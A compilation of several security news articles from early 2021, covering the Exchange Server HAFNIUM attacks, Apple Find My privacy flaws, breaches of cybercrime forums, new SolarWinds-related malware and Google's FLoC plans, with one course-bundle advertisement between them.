Microsoft Exchange Cyber Attack

Microsoft on Friday warned of active attacks exploiting unpatched Exchange Servers carried out by multiple threat actors, as the hacking campaign is believed to have infected tens of thousands of businesses, government entities in the U.S., Asia, and Europe.

The company said “it continues to see increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM,” signaling an escalation that the breaches are no longer “limited and targeted” as was previously deemed.

According to independent cybersecurity journalist Brian Krebs, at least 30,000 entities across the U.S. — mainly small businesses, towns, cities, and local governments — have been compromised by an “unusually aggressive” Chinese group that has set its sights on stealing emails from victim organizations by exploiting previously undisclosed flaws in Exchange Server.

Victims are also being reported from outside the U.S., with email systems belonging to businesses in Norway and the Czech Republic impacted in a series of hacking incidents abusing the vulnerabilities. The Norwegian National Security Authority said it has implemented a vulnerability scan of IP addresses in the country to identify vulnerable Exchange servers and “continuously notify these companies.”

The colossal scale of the ongoing offensive against Microsoft’s email servers also eclipses the SolarWinds hacking spree that came to light last December, which is said to have targeted as many as 18,000 customers of the IT management tools provider. But as it was with the SolarWinds hack, the attackers are likely to have only gone after high-value targets based on the initial reconnaissance of the victim machines.

Unpatched Exchange Servers at Risk of Exploitation

A successful exploitation of the flaws allows the adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access. With multiple threat actors leveraging these zero-day vulnerabilities, the post-exploitation activities are expected to differ from one group to the other based on their motives.

Microsoft Exchange Cyber Attack

The four security issues in question were patched by Microsoft as part of an emergency out-of-band security update last Tuesday, while warning that “many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.”

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), which released an emergency directive warning of “active exploitation” of the vulnerabilities, urged government agencies running vulnerable versions of Exchange Server to either update the software or disconnect the products from their networks.

“CISA is aware of widespread domestic and international exploitation of Microsoft Exchange Server vulnerabilities and urges scanning Exchange Server logs with Microsoft’s IoC detection tool to help determine compromise,” the agency tweeted on March 6.

It’s worth noting that merely installing the patches issued by Microsoft would have no effect on servers that have already been backdoored. Organizations that have been breached to deploy the web shell and other post-exploitation tools continue to remain at risk of future compromise until the artifacts are completely rooted out from their networks.

Multiple Clusters Spotted

FireEye’s Mandiant threat intelligence team said it “observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment” since the start of the year. Cybersecurity firm Volexity, one of the firms credited with discovering the flaws, said the intrusion campaigns appeared to have started around January 6, 2021.

Not much is known about the identities of the attackers, except that Microsoft has primarily attributed the exploits with high confidence to a group it calls Hafnium, a skilled government-backed group operating out of China. Mandiant is tracking the intrusion activity in three clusters, UNC2639, UNC2640, and UNC2643, adding it expects the number to increase as more attacks are detected.

In a statement to Reuters, a Chinese government spokesman denied the country was behind the intrusions.

“There are at least five different clusters of activity that appear to be exploiting the vulnerabilities,” said Katie Nickels, director of threat intelligence at Red Canary, while noting the differences in the techniques and infrastructure from that of the Hafnium actor.

In one particular instance, the cybersecurity firm observed some of the compromised Exchange servers had been deployed with a crypto-mining software called DLTminer, a malware documented by Carbon Black in 2019.

“One possibility is that Hafnium adversaries shared or sold exploit code, resulting in other groups being able to exploit these vulnerabilities,” Nickels said. “Another is that adversaries could have reverse engineered the patches released by Microsoft to independently figure out how to exploit the vulnerabilities.”

Microsoft Issues Mitigation Guidance

Microsoft has published new alternative mitigation guidance to help Microsoft Exchange customers who need more time to patch their deployments, in addition to pushing out a new update for the Microsoft Safety Scanner (MSERT) tool to detect web shells and releasing a script for checking HAFNIUM indicators of compromise. They can be found here.

“These vulnerabilities are significant and need to be taken seriously,” Mat Gangwer, senior director of managed threat response at Sophos said. “They allow attackers to remotely execute commands on these servers without the need for credentials, and any threat actor could potentially abuse them.”

“The broad installation of Exchange and its exposure to the internet mean that many organizations running an on-premises Exchange server could be at risk,” Gangwer added.

Cybersecurity researchers on Thursday disclosed two distinct design and implementation flaws in Apple’s crowdsourced Bluetooth location tracking system that can lead to a location correlation attack and unauthorized access to the location history of the past seven days, thereby by deanonymizing users.

The findings are a consequence of an exhaustive review undertaken by the Open Wireless Link (OWL) project, a team of researchers from the Secure Mobile Networking Lab at the Technical University of Darmstadt, Germany, who have historically taken apart Apple’s wireless ecosystem with the goal of identifying security and privacy issues.

In response to the disclosures on July 2, 2020, Apple is said to have partially addressed the issues, stated the researchers, who used their own data for the study citing privacy implications of the analysis.

How Find My Works?

Apple devices come with a feature called Find My that makes it easy for users to locate other Apple devices, including iPhone, iPad, iPod touch, Apple Watch, Mac, or AirPods. With the upcoming iOS 14.5, the company is expected to add support for Bluetooth tracking devices — called AirTags — that can be attached to items like keys and wallets, which in turn can be used for tracking purposes right from within the Find My app.

What’s more interesting is the technology that undergirds Find My. Called offline finding and introduced in 2019, the location tracking feature broadcasts Bluetooth Low Energy (BLE) signals from Apple devices, allowing other Apple devices in close proximity to relay their location to Apple’s servers.

Put differently, offline loading turns every mobile device into a broadcast beacon designed explicitly to shadow its movements by leveraging a crowdsourced location tracking mechanism that’s both end-to-end encrypted and anonymous, so much so that no third-party, including Apple, can decrypt those locations and build a history of every user’s whereabouts.

This is achieved via a rotating key scheme, specifically a pair of public-private keys that are generated by each device, which emits the Bluetooth signals by encoding the public key along with it. This key information is subsequently synchronized via iCloud with all other Apple devices linked to the same user (i.e., Apple ID).

A nearby iPhone or iPad (with no connection to the original offline device) that picks up this message checks its own location, then encrypts the information using the aforementioned public key before sending it to the cloud along with a hash of the public key.

In the final step, Apple sends this encrypted location of the lost device to a second Apple device signed in with the same Apple ID, from where the owner can use the Find My app to decrypt the reports using the corresponding private key and retrieve the last known location, with the companion device uploading the same hash of the public key to find a match in Apple’s servers.

Issues with Correlation and Tracking

Since the approach follows a public key encryption (PKE) setup, even Apple cannot decrypt the location as it’s not in possession of the private key. While the company has not explicitly revealed how often the key rotates, the rolling key pair architecture makes it difficult for malicious parties to exploit the Bluetooth beacons to track users’ movements.

But OWL researchers said the design allows Apple — in lieu of being the service provider — to correlate different owners’ locations if their locations are reported by the same finder devices, effectively allowing Apple to construct what they call a social graph.

“Law enforcement agencies could exploit this issue to deanonymize participants of (political) demonstrations even when participants put their phones in flight mode,” the researchers said, adding “malicious macOS applications can retrieve and decrypt the [offline finding] location reports of the last seven days for all its users and for all of their devices as cached rolling advertisement keys are stored on the file system in cleartext.”

In other words, the macOS Catalina vulnerability (CVE-2020-9986) could allow an attacker to access the decryption keys, using them to download and decrypt location reports submitted by the Find My network, and ultimately locate and identify their victims with high accuracy. The weakness was patched by Apple in November 2020 (version macOS 10.15.7) with “improved access restrictions.”

A second outcome of the investigation is an app that’s designed to let any user create an “AirTag.” Called OpenHaystack, the framework allows for tracking personal Bluetooth devices via Apple’s massive Find My network, enabling users to create their own tracking tags that can be appended to physical objects or integrated into other Bluetooth-capable devices.

This is not the first time researchers from Open Wireless Link (OWL) have uncovered flaws in Apple’s closed-source protocols by means of reverse engineering.

In May 2019, the researchers disclosed vulnerabilities in Apple’s Wireless Direct Link (AWDL) proprietary mesh networking protocol that permitted attackers to track users, crash devices, and even intercept files transferred between devices via man-in-the-middle (MitM) attacks.

This was later adapted by Google Project Zero researcher Ian Beer to uncover a critical “wormable” iOS bug last year that could have made it possible for a remote adversary to gain complete control of any Apple device in the vicinity over Wi-Fi.

As cloud computing continues to grow, Google Cloud is quickly becoming one of the most popular solutions.

However, relatively few engineers know this platform well.

This leaves the door open for aspiring IT professionals who take the official exams.

The Google Cloud Certifications Practice Tests + Courses Bundle helps you get certified faster, with 43 hours of video content and over 1,000 practice questions.

It covers seven Google exams, providing all the prep you could possibly need.

You would normally expect to pay $639 for this training, but ‘The Hacker News’ has put together an eye-catching deal with Whizlabs Learning Center.

Special OfferFor a limited time, you can pick up all the content mentioned above for just $29.99 with this bundle. That means you save over $600 on the full price!

As the demand for cloud computing experts grows, salaries are increasing.

According to Glassdoor, engineers earn $117,785 a year on average.

This bundle helps you join the gold rush, with seven courses working towards Google Certified Professional exams: Cloud Architect, Cloud Security Engineer, Data Engineer, Cloud Network Engineer, and Cloud Developer.

The courses cover everything you need to know to pass the test, along with plenty of practical knowledge. Just as importantly, you get practice exams to hone your skills.

The training comes from Whizlabs Learning Center, which has helped over 3 million students in the past 17 years.

Want to get started? Grab the training today to save 95% on lifetime access!

Mazafaka

In what’s a case of hackers getting hacked, a prominent underground online criminal forum by the name of Maza has been compromised by unknown attackers, making it the fourth forum to have been breached since the start of the year.

The intrusion is said to have occurred on March 3, with information about the forum members — including usernames, email addresses, and hashed passwords — publicly disclosed on a breach notification page put up by the attackers, stating “Your data has been leaked” and “This forum has been hacked.”

“The announcement was accompanied by a PDF file allegedly containing a portion of forum user data. The file comprised more than 3,000 rows, containing usernames, partially obfuscated password hashes, email addresses and other contact details,” cybersecurity firm Intel 471 said.

Originally called Mazafaka, Maza is an elite, invite-only Russian-language cybercrime forum known to be operational as early as 2003, acting as an exclusive online space for exploit actors to trade ransomware-as-a-service tools and conduct other forms of illicit cyber operations.

The development comes close on the heels of successful breaches of other forums, including that of Verified, Crdclub, and Exploit.

Verified is said to have been breached on January 20, 2021, with the actor behind the attack claiming access to the entire database on another popular forum called Raid Forums, besides transferring $150,000 worth of cryptocurrency from Verified’s bitcoin wallet to their own. The forum, however, staged a return last month on February 18 with a change in ownership, according to Flashpoint.

Then again, in February, a cybercrime forum by the name of Crdclub disclosed an attack that resulted in the compromise of an administrator account with the goal of defrauding its members. No other personal information appears to have been plundered.

“By doing so, the actor behind the attack was able to lure forum customers to use a money transfer service that was allegedly vouched for by the forum’s admins,” Intel 471 said. “That was a lie, and resulted in an unknown amount of money being diverted from the forum.”

Lastly, earlier this week, the Exploit cybercrime forum sustained an attack that involved an apparent compromise of a proxy server used for safeguarding the forum from distributed denial-of-service (DDoS) attacks.

Details are fuzzy as to the perpetrators of the attacks, with forum members speculating that it could be the work of a government intelligence agency, while also distressing over the possibility that their real-world identities could be exposed in the wake of the leaks.

Flashpoint researchers noted that the Russian sentences on the Maza forum’s notification page were possibly translated using an online translator, but added it’s unclear if this implies the involvement of a non-Russian speaking actor or if it was deliberately used to mislead attribution.

“While Intel 471 isn’t aware of anyone claiming responsibility for the breaches, whomever is behind the actions has indirectly given researchers an advantage,” the company concluded. “Any information unearthed from the breaches aids in the fight against these criminals due to the added visibility it gives security teams who are tracking actors that populate these forums.”

FireEye and Microsoft on Thursday said they discovered three more malware strains in connection with the SolarWinds supply-chain attack, including a “sophisticated second-stage backdoor,” as the investigation into the sprawling espionage campaign continues to yield fresh clues about the threat actor’s tactics and techniques.

Dubbed GoldMax (aka SUNSHUTTLE), GoldFinder, and Sibot, the new set of malware adds to a growing list of malicious tools such as Sunspot, Sunburst (or Solorigate), Teardrop, and Raindrop that were stealthily delivered to enterprise networks by alleged Russian operatives.

“These tools are new pieces of malware that are unique to this actor,” Microsoft said. “They are tailor-made for specific networks and are assessed to be introduced after the actor has gained access through compromised credentials or the SolarWinds binary and after moving laterally with Teardrop and other hands-on-keyboard actions.”

Microsoft also took the opportunity to name the actor behind the attacks against SolarWinds as NOBELIUM, which is also being tracked under different monikers by the cybersecurity community, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), and Dark Halo (Volexity).

While Sunspot was deployed into the build environment to inject the Sunburst backdoor into SolarWinds’s Orion network monitoring platform, Teardrop and Raindrop have been primarily used as post-exploitation tools to laterally move across the network and deliver the Cobalt Strike Beacon.

Spotted between August to September 2020, SUNSHUTTLE is a Golang-based malware that acts as a command-and-control backdoor, establishing a secure connection with an attacker-controlled server to receive commands to download and execute files, upload files from the system to the server, and execute operating system commands on the compromised machine.

For its part, FireEye said it observed the malware at a victim compromised by UNC2452, but added it hasn’t been able to fully verify the backdoor’s connection to the threat actor. The company also stated it discovered SUNSHUTTLE in August 2020 after it was uploaded to a public malware repository by an unnamed U.S.-based entity.

One of the most notable features of GoldMax is the ability to cloak its malicious network traffic with seemingly benign traffic by pseudo-randomly selecting referrers from a list of popular website URLs (such as www.bing.com, www.yahoo.com, www.facebook.com, www.twitter.com, and www.google.com) for decoy HTTP GET requests pointing to C2 domains.

“The new SUNSHUTTLE backdoor is a sophisticated second-stage backdoor that demonstrates straightforward but elegant detection evasion techniques via its ‘blend-in’ traffic capabilities for C2 communications,” FireEye detailed. “SUNSHUTTLE would function as a second-stage backdoor in such a compromise for conducting network reconnaissance alongside other Sunburst-related tools.”

GoldFinder, also written in Go, is an HTTP tracer tool for logging the route a packet takes to reach a C2 server. In contrast, Sibot is a dual-purpose malware implemented in VBScript that’s designed to achieve persistence on infected machines before downloading and executing a payload from the C2 server. Microsoft said it observed three obfuscated variants of Sibot.

Even as the different pieces of SolarWinds attack puzzle fall into place, the development once again underscores the scope and sophistication in the range of methods used to penetrate, propagate, and persist in victim environments.

“These capabilities differ from previously known NOBELIUM tools and attack patterns, and reiterate the actor’s sophistication,” Microsoft said. “In all stages of the attack, the actor demonstrated a deep knowledge of software tools, deployments, security software and systems common in networks, and techniques frequently used by incident response teams.”

Google FLoC and FLEDGE

Signaling a major shift to its ads-driven business model, Google on Wednesday unequivocally stated it would not build alternate identifiers or tools to track users across multiple websites once it begins phasing out third-party tracking cookies from its Chrome browser by early 2022.

“Instead, our web products will be powered by privacy-preserving APIs which prevent individual tracking while still delivering results for advertisers and publishers,” said David Temkin, Google’s director of product management for ads privacy and trust.

“Advances in aggregation, anonymization, on-device processing and other privacy-preserving technologies offer a clear path to replacing individual identifiers.”

The changes, which could potentially reshape the advertising landscape, are expected only to cover websites visited via Chrome and do not extend to mobile apps.

At the same time, Google acknowledged that other companies might find alternative ways to track individual users. “We realize this means other providers may offer a level of user identity for ad tracking across the web that we will not,” Temkin said. “We don’t believe these solutions will meet rising consumer expectations for privacy, nor will they stand up to rapidly evolving regulatory restrictions.”

Over the years, third-party cookies have become the mainstay driving digital ad business, but mounting concerns about data privacy infringement have led major browser vendors such as Apple, Mozilla, Brave, and Microsoft to introduce countermeasures to pull the plug on invasive tracking technology, in turn forcing Google to respond with similar privacy-first solutions or risk losing customer trust.

FLoC and FLEDGE for Privacy-Preserving Ad Targeting

For its part, the search giant — in an attempt to balance its twin roles as a web browser developer and owner of the world’s largest advertising platform — early last year announced plans to eliminate third-party cookies in Chrome in favor of a new framework called the “Privacy Sandbox,” which aims to protect anonymity while still delivering targeted ads without resorting to more opaque techniques like fingerprinting.

To that effect, Google has proposed a continually evolving collection of bird-themed ad targeting and measurement methods aimed at supplanting third-party cookies, chief among them being Federated Learning of Cohorts (FLoC) and TURTLEDOVE, which it hopes will emerge the standards for serving ads on the web.

Leveraging a technique called on-device machine learning, FLoC essentially aims to classify online users into groups based on similar browsing behaviors, with each user’s browser sharing what’s called a “cohort ID” to websites and marketers, who can then target users with ads based on the groups they belong to.

In other words, the data gathered locally from the browser is never shared and never leaves the device. By using this interest-based advertising approach, the idea is to hide users “in the crowd,” thereby keeping a person’s browsing history private and offering protections from individualized tracking and profiling.

TURTLEDOVE (and its extension called “FLEDGE“), on the other hand, suggests a new method for advertisers and ad tech companies to target an ad to an audience they had previously built without revealing other information about a users’ browsing habits or ad interests.

Google is set to test FLoC-based cohorts publicly later this month, starting with Chrome 89, before extending the trials with advertisers in Google Ads in the second quarter.

Concerns About Control, Privacy, and Trust

While these privacy-preserving plans mean less personal data is sent to third-parties, questions are being raised about how users will be grouped together and what guardrails are being put in place to avoid unlawful discrimination against certain groups based on sensitive attributes such as ethnicity, religion, gender, or sexual orientation.

Outlining that the change in underlying infrastructure involves sharing new information with advertisers, the Electronic Frontier Foundation (EFF) equated FLoC to a “behavioral credit score,” calling it a “terrible idea” that creates new privacy risks, including the likelihood of websites to uniquely fingerprint FLoC users and access more personal information than required to serve relevant ads.

“If you visit a site for medical information, you might trust it with information about your health, but there’s no reason it needs to know what your politics are,” EFF’s Bennett Cyphers said. “Likewise, if you visit a retail website, it shouldn’t need to know whether you’ve recently read up on treatment for depression. FLoC erodes this separation of contexts, and instead presents the same behavioral summary to everyone you interact with.”

Also of note is the scope and potential implications of Privacy Sandbox.

With Chrome’s widespread market share of over 60% across desktop and mobile devices, Google’s attempts to replace the cookie have been met with skepticism and pushbacks, not to mention attracting regulatory scrutiny earlier this year over worries that “the proposals could cause advertising spend to become even more concentrated on Google’s ecosystem at the expense of its competitors.”

The initiative has also been called out for being under Google’s control and fears that it may only serve to tighten the company’s grip on the advertising industry and the web as a whole, which critics say will “force more marketers into their walled garden and will spell the end of the independent and Open Web.”

In response, Google noted it has taken into account the feedback about browser-centric control by incorporating what it calls a “trusted server” in FLEDGE to store information about an ad campaign’s bids and budgets.

All said and done, third-party cookies aren’t the only means to deliver ads on the web. Companies that collect first-party data, counting Facebook and Google, can still be able to serve personalized ads, as ad tech firms that are embracing a DNS technique called CNAME cloaking to pass off third-party tracking code as coming from a first-party.

“Keeping the internet open and accessible for everyone requires all of us to do more to protect privacy — and that means an end to not only third-party cookies, but also any technology used for tracking individual people as they browse the web,” Google said, adding it remains “committed to preserving a vibrant and open ecosystem where people can access a broad range of ad-supported content with confidence that their privacy and choices are respected.”